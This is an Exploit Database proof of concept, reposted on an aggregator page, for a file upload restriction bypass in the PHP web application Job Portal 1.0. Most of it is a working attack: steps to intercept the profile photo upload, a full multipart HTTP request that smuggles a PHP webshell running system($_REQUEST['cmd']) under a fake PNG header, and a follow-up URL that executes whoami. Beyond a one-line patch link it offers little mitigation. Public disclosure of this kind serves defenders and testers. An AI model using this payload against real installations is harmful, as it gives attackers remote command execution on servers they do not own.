Job Portal 1.0 – File Upload Restriction Bypass

• Exploit Database
• 15 阅读

• 作者： Rafael Pedrero
  日期： 2023-05-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51440/

• <!--
  # Exploit Title: Job Portal 1.0 - File Upload Restriction Bypass
  # Date: 27-06-2019
  # Exploit Author: Rafael Pedrero
  # Vendor Homepage: https://phpgurukul.com/job-portal-project/
  # Software Link:
  https://phpgurukul.com/?smd_process_download=1&download_id=7855
  # Version: 1.0
  # Tested on: Windows 7 64 Bits / Windows 10 64 Bits
  # CVE :
  # Category: webapps
  
  
  1. Description
  
  File Upload Restriction Bypass vulnerabilities were found in Job Portal
  1.0. This allows for an authenticated user to potentially obtain RCE via
  webshell.
  
  
  2. Proof of Concept
  
  1. Go the user profile >> (/jobportal/applicant/)
  2.- Select profile image and load a valid image.
  3. Turn Burp/ZAP Intercept On
  4. Select webshell - ex: shell.png
  5. Alter request in the upload...
   Update 'filename' to desired extension. ex: shell.php
   Not neccesary change content type to 'image/png'
  
  Example exploitation request:
  
  ====================================================================================================
  
  POST http://127.0.0.1/jobportal/applicant/controller.php?action=photos
  HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
  Gecko/20100101 Firefox/70.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
  Content-Type: multipart/form-data;
  boundary=---------------------------57052814523281
  Content-Length: 555
  Origin: https://127.0.0.1
  Connection: keep-alive
  Referer: https://127.0.0.1/jobportal/applicant/index.php?view=view&id=
  Cookie: PHPSESSID=qf9e02j0rda99cj91l36qcat34
  Upgrade-Insecure-Requests: 1
  Host: 127.0.0.1
  
  -----------------------------57052814523281
  Content-Disposition: form-data; name="MAX_FILE_SIZE"
  
  1000000
  -----------------------------57052814523281
  Content-Disposition: form-data; name="photo"; filename="shell.php"
  Content-Type: image/png
  
  ?PNG
  ...
  <?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"?>
  IEND
  -----------------------------57052814523281
  Content-Disposition: form-data; name="savephoto"
  
  
  -----------------------------57052814523281--
  
  ====================================================================================================
  
  6. Send the request and visit your new webshell
   Ex: https://127.0.0.1/jobportal/applicant/photos/shell.php?cmd=whoami
   nt authority\system
  
  3. Solution:
  
  Patch:
  https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
  
  -->